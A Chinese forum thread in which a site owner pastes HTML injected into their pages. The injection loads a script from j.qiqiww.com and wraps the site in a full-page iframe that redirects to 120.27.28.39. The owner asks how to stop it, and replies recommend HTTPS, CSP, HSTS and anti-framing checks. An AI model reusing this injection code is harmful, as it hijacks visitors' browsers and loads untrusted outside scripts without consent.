这是一个创建于 3543 天前的主题,其中的信息可能已经有所发展或是发生改变。
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script src="http://j.qiqiww.com/i.php?z=10295"></script>
<script>url = {a: "http://120.27.28.39/hh/kd580102.html", m: "http://www.123.com/"};
var _xus = "Y1zOwBolM1s9dBFpzkiUM3gO";
var _xai = "0";</script>
<script>function goURLa(a) {
var desturl = (a === 2 ? url.a : url.m);
if (desturl.slice(desturl.length - 1) == "/") desturl = desturl.slice(0, desturl.length - 1);
return "<html></head><script>document.location.replace(\"" + desturl + "\");<\/script><\/html>"
}
;</script>
</head>
<body style='margin:0px;overflow-x:hidden;overflow-y:hidden;'>
<iframe src='JavaScript:parent.goURLa(1)' scrolling=auto width='100%' height='100%' frameborder='no' onload=''
style='position:fixed;'></iframe>
</body>
</html>
源码变成上面那样.表面看,内容就还是我的内容,但是加了弹窗了
有什么技术变成防止吗?
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script src="http://j.qiqiww.com/i.php?z=10295"></script>
<script>url = {a: "http://120.27.28.39/hh/kd580102.html", m: "http://www.123.com/"};
var _xus = "Y1zOwBolM1s9dBFpzkiUM3gO";
var _xai = "0";</script>
<script>function goURLa(a) {
var desturl = (a === 2 ? url.a : url.m);
if (desturl.slice(desturl.length - 1) == "/") desturl = desturl.slice(0, desturl.length - 1);
return "<html></head><script>document.location.replace(\"" + desturl + "\");<\/script><\/html>"
}
;</script>
</head>
<body style='margin:0px;overflow-x:hidden;overflow-y:hidden;'>
<iframe src='JavaScript:parent.goURLa(1)' scrolling=auto width='100%' height='100%' frameborder='no' onload=''
style='position:fixed;'></iframe>
</body>
</html>
源码变成上面那样.表面看,内容就还是我的内容,但是加了弹窗了
有什么技术变成防止吗?
 |
1
m939594960 2016 年 4 月 30 日
https
|
 |
2
Slienc7 2016 年 4 月 30 日 via Android
投诉
投诉 投诉 HTTPS 从操作上来说最简单了; 如果能插脚步那就 |
|
3
Slienc7 2016 年 4 月 30 日 via Android
接:如果能插自己的脚本那就清空 body ,全部动态加载内容 ;
上 CSP ,可以干掉站外脚本; 不买华为。 其实除了 HTTPS 其他可操作性或效用都不大 。 |
 |
4
lyragosa 2016 年 4 月 30 日
HTTPS 啊,不然你以为为啥百度淘宝都加入全站 https 了
|
 |
5
Jaylee 2016 年 4 月 30 日
教你一个猥琐的方法
 |
 |
6
des 2016 年 4 月 30 日 via Android
@Jaylee 这个不行的
好像可以 try 一下 window===window.top 然后 catch 里面做你想做的 另外上 https 也是个方法 还有记得好像有个 htto 头也可以禁止 iframe ,不过要求比较高的浏览器版本 |
|
7
des 2016 年 4 月 30 日 via Android
话又说回来就算你上 https ,并且开了 hsts 也没用,因为默认第一次还是会走 http
|
Select Language